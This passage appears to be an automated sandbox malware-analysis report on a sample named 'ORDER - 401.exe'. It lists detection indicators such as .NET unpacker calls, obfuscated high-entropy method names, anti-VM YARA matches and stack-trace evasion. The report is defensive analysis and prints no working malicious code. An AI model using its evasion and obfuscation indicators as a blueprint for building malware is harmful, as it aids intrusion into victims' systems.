                Source: Binary string: wntdll.pdbUGP source: ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER - 401.exe, ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs.Net Code: TWhPUwXM6H System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs.Net Code: TWhPUwXM6H System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER - 401.exe.6ff0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6A5F3 push es; ret 0_2_04B6A5FA
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6A5EF push es; ret 0_2_04B6A5F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6A681 push es; ret 0_2_04B6A682
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6A6DB push es; ret 0_2_04B6A6E2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6A6D9 push es; ret 0_2_04B6A6DA
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6E1EF push ss; ret 0_2_04B6E1F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6E1EB push ss; ret 0_2_04B6E1EE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6EAD8 push ds; ret 0_2_04B6EADA
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6EA40 push ds; ret 0_2_04B6EA42
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6EBF7 push ds; ret 0_2_04B6EBFA
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6EBF3 push ds; ret 0_2_04B6EBF6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6EBEF push ds; ret 0_2_04B6EBF2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B614D8 push edx; retf 0_2_04B614FF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6D551 push cs; ret 0_2_04B6D552
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B6D548 push cs; ret 0_2_04B6D54A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040D8D0 pushad ; iretd 5_2_0040D8D1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_004031B0 push eax; ret 5_2_004031B2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040D3DE pushad ; retf 5_2_0040D3DF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00414C77 push es; iretd 5_2_00414C79
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00415DE9 push ebp; iretd 5_2_00415E4B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040E61C push es; retf 5_2_0040E61D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00418699 push esp; iretd 5_2_0041869A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00405F99 push edi; retf 5_2_00405F9A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010109AD push ecx; mov dword ptr [esp], ecx5_2_010109B6
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027CA21E push edi; retf 7_2_027CA21F
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D1B55 pushad ; iretd 7_2_027D1B56
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DA06E push ebp; iretd 7_2_027DA0D0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D28A1 push es; retf 7_2_027D28A2
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DC91E push esp; iretd 7_2_027DC91F
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D1663 pushad ; retf 7_2_027D1664
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D8EFC push es; iretd 7_2_027D8EFE
                Source: ORDER - 401.exeStatic PE information: section name: .text entropy: 7.7236492887754595
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, uLpBcQ1iE6j6nspAqO.csHigh entropy of concatenated method names: 'ToString', 'KJFOLsw1tV', 'Xb1OFTR8Jk', 'h41OyyyKc4', 'YC6OhaD3l4', 'L1lOssyTtI', 'McRON17P6p', 'g7GOTIO19b', 'CsBOHd54lL', 'GuiOpdAHsv'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, Q1n6m6PWnBd6Yj0vIv.csHigh entropy of concatenated method names: 'DAF80tyuSp', 'QLs8V9Z4EJ', 'Lbk8j0ObJQ', 'OFl8ZvM065', 'vJ28AXUAVf', 'l2Z8Or9bvd', 'lfHCQnUAs2G2vLDB5I', 'QjeqN3EblSM7ndB10N', 'gvj88D0jtA', 'VMu8Q7fE6i'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, TAEGUkSayFYRJToS90.csHigh entropy of concatenated method names: 'uRlBqsG464', 'QfsBlEZO7d', 'toNBrxcDf9', 'b48B0V02D1', 'qJnBKwf2pq', 'h6DBV5BLFa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, QgQX3i8kjHvSZE1DcqJ.csHigh entropy of concatenated method names: 'ToString', 'eLI6R4iD0V', 'gL569bbCv0', 'Q1Y6DnWNof', 'CKM6EeNfIV', 'lFO6FaKxLQ', 'AaY6y1HfW1', 'sGa6hmuaxX', 'oT41ShszqJRUnaW4cAV', 'Fful6vmZq74aRHFS930'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HtyuSpR3Ls9Z4EJjgG.csHigh entropy of concatenated method names: 'aPT54cENqs', 'RYG5aAYY0n', 'snH51neq5x', 'ygZ5w02LEG', 'KB35t52uHQ', 'M6Y5d0I0ht', 'i0W5oPfu91', 'w265MftX1J', 'Jr15vVabXE', 'zxW5SoqIFY'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, pLWf4nvp9MSF2Z2pHI.csHigh entropy of concatenated method names: 'CSyKEO4IK6', 'huKKFqiQwS', 'YaMKykDuSj', 'XdtKhBgloV', 'mlxKsvqNCx', 'i1aKNG1UdG', 'hwmKTWfvKY', 'OIbKHoPWi8', 'NjCKpE0w6l', 'jToKYw1gQ3'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, Ep2iAM3HXQ8bsvYHCK.csHigh entropy of concatenated method names: 'OuJXRT3ehe', 'mg5X9ZmGuC', 'fE9XElyYbg', 'PFyXFdA6CW', 'v4jXh31Qw7', 'EoZXsSSnCa', 'M7uXTamGFM', 'KupXH3fMLE', 'vsTXYvKqp5', 'RxMXLP1ZCN'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, oVfW2ZEr9bvdHF9Opp.csHigh entropy of concatenated method names: 'AFErJuagvX', 'QmRr5qJZmR', 'uaFrlvSvkJ', 'M3Lr0jLNjp', 'ODTrV6HlE0', 'Bf6ltEHfvR', 'bNAldZH0lK', 'JPOloAstO8', 'QcllMAmcb0', 'y2NlvK9WbU'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.csHigh entropy of concatenated method names: 'luSQJ5lIDi', 'FAXQnxhu5n', 'sYlQ5ddumu', 'bP2QqCCvvp', 'v9LQlK7l57', 'ROcQrbXHFV', 'SSvQ0JwmO0', 'J3KQVB92Qv', 'CMAQWlXWjg', 'jUpQjJ7dsn'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, z2DpoidV02NHKIJE69.csHigh entropy of concatenated method names: 'j3Z2MInOmE', 'Mko2SU2cOC', 'osVi7buYKE', 'mhBi8hf2hZ', 'S3D2Lk1xVb', 'e3H2uYkrVA', 'OU823nPkGD', 'xr024x5ayK', 'vyP2aI8P4E', 'jtO21feDtu'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, iBUyGGoCP8m6q3fmVM.csHigh entropy of concatenated method names: 'rcJKAOK3Ep', 'jJjK2Ig3WQ', 'd1qKKyWv2v', 'uKYK6K1xPT', 'A0FKGZe2jL', 'GkmKm51jc6', 'Dispose', 'qm3innJ2vm', 'Ddvi5LkHSh', 'jBgiqm0AvI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, wW4nPF5h3062hYG1RF.csHigh entropy of concatenated method names: 'Dispose', 'am68vq3fmV', 'MA8kF9TEtm', 'JJnUS6qlsS', 'X1d8SSASS4', 'ODe8zmIm0j', 'ProcessDialogKey', 'e4Ok7LWf4n', 'N9Mk8SF2Z2', 'MHIkkwAEGU'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, W065flD2hm3EUGJ2XU.csHigh entropy of concatenated method names: 'tDGlCcDFHk', 'DK1lfnTx37', 'QsWqydMwfx', 'uhgqhrsH51', 'iDaqsTMXHa', 'xNFqNsaOiQ', 'lfrqTqjalN', 'Qw9qHjFPhp', 'Vdfqpl5qfa', 'N2WqYVaowO'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, a1LbuN884WokIU0msjE.csHigh entropy of concatenated method names: 'HueBSNUHqe', 'X34Bz86NRL', 'w1Y67XTy2y', 'EwX68KhcJJ', 'wpr6kmLKRu', 'tfL6QZVTmK', 'G2F6PFe0VI', 'ftu6JBsHvs', 'kpq6n7BHun', 'CTV652tkSx'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, M7CP3Bq5RQXQOXCQj4.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hVWkvlknrY', 'FwikSlt6Gr', 'YPXkze4RHM', 'x8PQ71E2M5', 'MnZQ8uxmKj', 'srGQkucZyU', 'ha8QQqXATt', 'qy1Zdu2IOW4MFfpD9Vi'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, PxIeI487WEb3VwRmLS6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQWBLXRDA2', 'FxcBu2bhtA', 'aZgB3NlCZM', 'NpjB4pCceR', 'Ru0BaxtS1h', 'piqB18fh0W', 'y8wBwKV0sT'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, A38q5fk3M2oVsvwXH6.csHigh entropy of concatenated method names: 'nj5UD2uYn', 'wp5xaMDJG', 'iUTIoXuFi', 'OH4fMayWp', 'NsF9RdwhO', 'wuTDwSYe4', 'CfbiyteMY96ZisL5r8', 'r4qqWe7WmKhcbDLsJ8', 'cw5ikuXvT', 'DW7BE3BL0'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, YyYdhfTNhqxaIZeAv5.csHigh entropy of concatenated method names: 'vbb0naPHOr', 'P6j0qRkFHN', 'hOd0rl0pUG', 'BkZrSasy22', 'K0arz63DsL', 'BIC07ewrrN', 'NaZ08KikN5', 'SFA0kgrRK1', 'Ukl0QA2IGu', 'DfH0PSsDyV'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, IqS7gPwmshBc2txLDH.csHigh entropy of concatenated method names: 'Cjj2jreKLA', 'vqR2ZgGY0w', 'ToString', 'AS92niTNVc', 'Ppp253y9Yr', 'kDg2qlMrOV', 'qss2limssX', 'CWx2rVKEAc', 'di320a8AcI', 'jL52Vy50FI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, InnIZO48UkSWft8aCD.csHigh entropy of concatenated method names: 'sCNAY9J3dm', 'KEpAu7i3jm', 'IXmA4iGYeL', 'Yg4AavlYAy', 'wgwAFOxyXw', 'pW1AyeXSi2', 'DKgAhPxdMU', 'VrPAsXwD7v', 'mg9ANU1FCb', 'uxKATf1bY6'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, uGrGY08PbqOF82LUnIn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MbNeK1SScU', 'fAceBgwolG', 'VlXe6lWt2V', 'N1EeeOI4WH', 'Oa8eG6wChb', 'vvPebNNi8a', 'w0FemgyYDI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, qww2aEpv3URbyYY9VD.csHigh entropy of concatenated method names: 'Mvc0cLvhMf', 'iH90gXWUrD', 'zop0U05fRR', 'AfI0xndMFO', 'RPY0COuDeX', 'vEM0IRk1RU', 'xY90fRKiUL', 'oea0REWqiC', 'QTF09brB7q', 'iQL0DtxrBR'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, tXMW2T9bk0ObJQYFlv.csHigh entropy of concatenated method names: 'bkPqxCcyq6', 'zePqI6mCH6', 'NsAqRXCaB5', 'vYUq9sYOfv', 'fANqAQZgHo', 'X1FqO4mVKk', 'qhsq2uiW5p', 'O5Fqi7OjLQ', 'DIsqK3Yg0E', 'uDtqBWhlkG'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, BwOqc3zQiesYrVLOFE.csHigh entropy of concatenated method names: 'YaKBICDnNv', 'ji0BRTkAuR', 'FTbB9j2FCb', 'gHsBEU8m2a', 'vhBBFBReaX', 'wTFBhU29Jj', 'rc0BsODaNU', 'ueCBm5JTKb', 'bYYBcSFu21', 'xV3BgkSvxf'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, uLpBcQ1iE6j6nspAqO.csHigh entropy of concatenated method names: 'ToString', 'KJFOLsw1tV', 'Xb1OFTR8Jk', 'h41OyyyKc4', 'YC6OhaD3l4', 'L1lOssyTtI', 'McRON17P6p', 'g7GOTIO19b', 'CsBOHd54lL', 'GuiOpdAHsv'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, Q1n6m6PWnBd6Yj0vIv.csHigh entropy of concatenated method names: 'DAF80tyuSp', 'QLs8V9Z4EJ', 'Lbk8j0ObJQ', 'OFl8ZvM065', 'vJ28AXUAVf', 'l2Z8Or9bvd', 'lfHCQnUAs2G2vLDB5I', 'QjeqN3EblSM7ndB10N', 'gvj88D0jtA', 'VMu8Q7fE6i'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, TAEGUkSayFYRJToS90.csHigh entropy of concatenated method names: 'uRlBqsG464', 'QfsBlEZO7d', 'toNBrxcDf9', 'b48B0V02D1', 'qJnBKwf2pq', 'h6DBV5BLFa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, QgQX3i8kjHvSZE1DcqJ.csHigh entropy of concatenated method names: 'ToString', 'eLI6R4iD0V', 'gL569bbCv0', 'Q1Y6DnWNof', 'CKM6EeNfIV', 'lFO6FaKxLQ', 'AaY6y1HfW1', 'sGa6hmuaxX', 'oT41ShszqJRUnaW4cAV', 'Fful6vmZq74aRHFS930'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HtyuSpR3Ls9Z4EJjgG.csHigh entropy of concatenated method names: 'aPT54cENqs', 'RYG5aAYY0n', 'snH51neq5x', 'ygZ5w02LEG', 'KB35t52uHQ', 'M6Y5d0I0ht', 'i0W5oPfu91', 'w265MftX1J', 'Jr15vVabXE', 'zxW5SoqIFY'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, pLWf4nvp9MSF2Z2pHI.csHigh entropy of concatenated method names: 'CSyKEO4IK6', 'huKKFqiQwS', 'YaMKykDuSj', 'XdtKhBgloV', 'mlxKsvqNCx', 'i1aKNG1UdG', 'hwmKTWfvKY', 'OIbKHoPWi8', 'NjCKpE0w6l', 'jToKYw1gQ3'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, Ep2iAM3HXQ8bsvYHCK.csHigh entropy of concatenated method names: 'OuJXRT3ehe', 'mg5X9ZmGuC', 'fE9XElyYbg', 'PFyXFdA6CW', 'v4jXh31Qw7', 'EoZXsSSnCa', 'M7uXTamGFM', 'KupXH3fMLE', 'vsTXYvKqp5', 'RxMXLP1ZCN'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, oVfW2ZEr9bvdHF9Opp.csHigh entropy of concatenated method names: 'AFErJuagvX', 'QmRr5qJZmR', 'uaFrlvSvkJ', 'M3Lr0jLNjp', 'ODTrV6HlE0', 'Bf6ltEHfvR', 'bNAldZH0lK', 'JPOloAstO8', 'QcllMAmcb0', 'y2NlvK9WbU'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.csHigh entropy of concatenated method names: 'luSQJ5lIDi', 'FAXQnxhu5n', 'sYlQ5ddumu', 'bP2QqCCvvp', 'v9LQlK7l57', 'ROcQrbXHFV', 'SSvQ0JwmO0', 'J3KQVB92Qv', 'CMAQWlXWjg', 'jUpQjJ7dsn'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, z2DpoidV02NHKIJE69.csHigh entropy of concatenated method names: 'j3Z2MInOmE', 'Mko2SU2cOC', 'osVi7buYKE', 'mhBi8hf2hZ', 'S3D2Lk1xVb', 'e3H2uYkrVA', 'OU823nPkGD', 'xr024x5ayK', 'vyP2aI8P4E', 'jtO21feDtu'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, iBUyGGoCP8m6q3fmVM.csHigh entropy of concatenated method names: 'rcJKAOK3Ep', 'jJjK2Ig3WQ', 'd1qKKyWv2v', 'uKYK6K1xPT', 'A0FKGZe2jL', 'GkmKm51jc6', 'Dispose', 'qm3innJ2vm', 'Ddvi5LkHSh', 'jBgiqm0AvI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, wW4nPF5h3062hYG1RF.csHigh entropy of concatenated method names: 'Dispose', 'am68vq3fmV', 'MA8kF9TEtm', 'JJnUS6qlsS', 'X1d8SSASS4', 'ODe8zmIm0j', 'ProcessDialogKey', 'e4Ok7LWf4n', 'N9Mk8SF2Z2', 'MHIkkwAEGU'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, W065flD2hm3EUGJ2XU.csHigh entropy of concatenated method names: 'tDGlCcDFHk', 'DK1lfnTx37', 'QsWqydMwfx', 'uhgqhrsH51', 'iDaqsTMXHa', 'xNFqNsaOiQ', 'lfrqTqjalN', 'Qw9qHjFPhp', 'Vdfqpl5qfa', 'N2WqYVaowO'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, a1LbuN884WokIU0msjE.csHigh entropy of concatenated method names: 'HueBSNUHqe', 'X34Bz86NRL', 'w1Y67XTy2y', 'EwX68KhcJJ', 'wpr6kmLKRu', 'tfL6QZVTmK', 'G2F6PFe0VI', 'ftu6JBsHvs', 'kpq6n7BHun', 'CTV652tkSx'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, M7CP3Bq5RQXQOXCQj4.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hVWkvlknrY', 'FwikSlt6Gr', 'YPXkze4RHM', 'x8PQ71E2M5', 'MnZQ8uxmKj', 'srGQkucZyU', 'ha8QQqXATt', 'qy1Zdu2IOW4MFfpD9Vi'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, PxIeI487WEb3VwRmLS6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQWBLXRDA2', 'FxcBu2bhtA', 'aZgB3NlCZM', 'NpjB4pCceR', 'Ru0BaxtS1h', 'piqB18fh0W', 'y8wBwKV0sT'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, A38q5fk3M2oVsvwXH6.csHigh entropy of concatenated method names: 'nj5UD2uYn', 'wp5xaMDJG', 'iUTIoXuFi', 'OH4fMayWp', 'NsF9RdwhO', 'wuTDwSYe4', 'CfbiyteMY96ZisL5r8', 'r4qqWe7WmKhcbDLsJ8', 'cw5ikuXvT', 'DW7BE3BL0'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, YyYdhfTNhqxaIZeAv5.csHigh entropy of concatenated method names: 'vbb0naPHOr', 'P6j0qRkFHN', 'hOd0rl0pUG', 'BkZrSasy22', 'K0arz63DsL', 'BIC07ewrrN', 'NaZ08KikN5', 'SFA0kgrRK1', 'Ukl0QA2IGu', 'DfH0PSsDyV'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, IqS7gPwmshBc2txLDH.csHigh entropy of concatenated method names: 'Cjj2jreKLA', 'vqR2ZgGY0w', 'ToString', 'AS92niTNVc', 'Ppp253y9Yr', 'kDg2qlMrOV', 'qss2limssX', 'CWx2rVKEAc', 'di320a8AcI', 'jL52Vy50FI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, InnIZO48UkSWft8aCD.csHigh entropy of concatenated method names: 'sCNAY9J3dm', 'KEpAu7i3jm', 'IXmA4iGYeL', 'Yg4AavlYAy', 'wgwAFOxyXw', 'pW1AyeXSi2', 'DKgAhPxdMU', 'VrPAsXwD7v', 'mg9ANU1FCb', 'uxKATf1bY6'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, uGrGY08PbqOF82LUnIn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MbNeK1SScU', 'fAceBgwolG', 'VlXe6lWt2V', 'N1EeeOI4WH', 'Oa8eG6wChb', 'vvPebNNi8a', 'w0FemgyYDI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, qww2aEpv3URbyYY9VD.csHigh entropy of concatenated method names: 'Mvc0cLvhMf', 'iH90gXWUrD', 'zop0U05fRR', 'AfI0xndMFO', 'RPY0COuDeX', 'vEM0IRk1RU', 'xY90fRKiUL', 'oea0REWqiC', 'QTF09brB7q', 'iQL0DtxrBR'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, tXMW2T9bk0ObJQYFlv.csHigh entropy of concatenated method names: 'bkPqxCcyq6', 'zePqI6mCH6', 'NsAqRXCaB5', 'vYUq9sYOfv', 'fANqAQZgHo', 'X1FqO4mVKk', 'qhsq2uiW5p', 'O5Fqi7OjLQ', 'DIsqK3Yg0E', 'uDtqBWhlkG'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, BwOqc3zQiesYrVLOFE.csHigh entropy of concatenated method names: 'YaKBICDnNv', 'ji0BRTkAuR', 'FTbB9j2FCb', 'gHsBEU8m2a', 'vhBBFBReaX', 'wTFBhU29Jj', 'rc0BsODaNU', 'ueCBm5JTKb', 'bYYBcSFu21', 'xV3BgkSvxf'
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: ORDER - 401.exe PID: 940, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
